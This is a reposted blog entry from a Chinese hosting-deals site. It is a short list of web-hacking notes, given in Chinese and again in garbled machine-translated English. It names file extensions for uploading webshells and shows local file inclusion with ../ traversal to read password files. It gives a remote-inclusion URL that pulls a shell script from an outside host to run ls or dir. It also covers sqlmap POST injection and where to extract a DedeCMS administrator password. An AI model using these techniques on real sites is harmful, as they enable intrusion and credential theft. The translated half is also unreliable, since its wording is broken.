VPS参考测评推荐
专注分享VPS主机优惠信息
衡天云优惠活动
华纳云优惠活动

2016.5.19***经验总结

主机参考:VPS测评参考推荐/专注分享VPS服务器优惠信息!若您是商家可以在本站进行投稿,查看详情!此外我们还提供软文收录、PayPal代付、广告赞助等服务,查看详情!
我们发布的部分优惠活动文章可能存在时效性,购买时建议在本站搜索商家名称可查看相关文章充分了解该商家!若非中文页面可使用Edge浏览器同步翻译!PayPal代付/收录合作

PHP下防跨站用PHP自带的strip_tags()和htmlspecialchars()可以对用户提交的

html和PHP进行转换,对UPDATE和INSERT中的变量用以上两个函数转换

如果PHP假设在win上那么就可以解析cer,asa,aspx,asax,aspx,cdx格式的文件

而在Linux,Unix上则可以解析pl,PHP3,格式的文件(pl:perl语言)

PHP2,PHP,Inc,pwml,asa,cer利用上传webshell

如果PHP使用了文件包含的方法则用 www.xxx.com/index.php?page=./admin.php就可以读取当前路径下admin.php文件的内容了,也可以用../跳转到其他目录去查看其

它文件 Linux下如果路径对则可以读出密码文件若不对可以用../不断探测Linux主机下 www.xxx.com/index.php?page=http://www.hack.com/shell.txt?shell=ls

-a 可以遍历当前目录下的所有文件,win下提交www.xxx.com/index.php?

page=http://www.hack.com/shell.txt?shell=dir 同样遍历文件

sqlmap的post注入新学到的方法:在网站中找到表单提交的地方,填写信息提交,抓

包,抓到的包存在txt文件中,运行sqlmap,sqlmap.py -r 文件路径sqlmap,sqlmap.py -r 文件路径 --current-db 读取当前数据库

织梦cms 配置文件地址 data/admin/ 下,其中的ver.txt 存放的是系统的版本时间

系统文件时间,找到相应版本的日志文件地址。里面可以爆出管理员密码,找到后台

即可登录。


The strip_tags() and htmlspecialchars() provided by PHP can be used for cross site protection

HTML and PHP are transformed, and the variables in update and insert are transformed with the above two functions

If PHP is supposed to be on win, it can parse files in the format of CER, ASA, ASPX, asax, ASPX and CDX

On Linux and UNIX, files of PL, PHP3 and format can be parsed (pl: perl language)

Php2, PHP, Inc, pwml, ASA, CER use upload webshell

If PHP uses the method contained in the file, you can use www.xxx.com/index.php? Page =. / admin.php to read the content of the admin.php file in the current path, or you can use.. / to jump to other directories to view it

Under Linux, if the path is correct, you can read the password file. If not, you can use.. / to continuously probe the Linux host www.xxx.com/index.php? Page = http://www.hack.com/shell.txt? Shell = ls

-A can traverse all files in the current directory, and submit www.xxx.com/index.php under win?

Page = http://www.hack.com/shell.txt? Shell = dir also traverses files

SQL map post injection new learning method: find the place of form submission in the website, fill in information submission, grasp

Package. The caught package exists in the txt file. Run sqlmap, sqlmap.py-r file path sqlmap, sqlmap.py-r file path -- current DB to read the current database

Under the address data / admin / of Zhimeng CMS configuration file, ver.txt stores the version time of the system

, system file time, find the log file address of the corresponding version. You can find the administrator's password and find the backstage

To log in.

--------------------------------------------------------------
主机参考,收集国内外VPSVPS测评主机测评云服务器虚拟主机独立服务器,国内外服务器高性价比建站主机相关优惠信息@zhujicankao.com
详细介绍和测评国外VPS主机,云服务器,国外服务器,国外主机的相关优惠信息,商家背景,网络带宽等等,也是目前国内最好的主机云服务器VPS参考测评资讯优惠信息分享平台

这几篇文章你可能也喜欢:

本文由主机参考刊发,转载请注明:2016.5.19***经验总结 https://zhujicankao.com/12892.html

【腾讯云】领8888元采购礼包,抢爆款云服务器 每月 9元起,个人开发者加享折上折!
打赏
转载请注明原文链接:主机参考 » 2016.5.19***经验总结
主机参考仅做资料收集,不对商家任何信息及交易做信用担保,购买前请注意风险,有交易纠纷请自行解决!请查阅:特别声明

评论 抢沙发

评论前必须登录!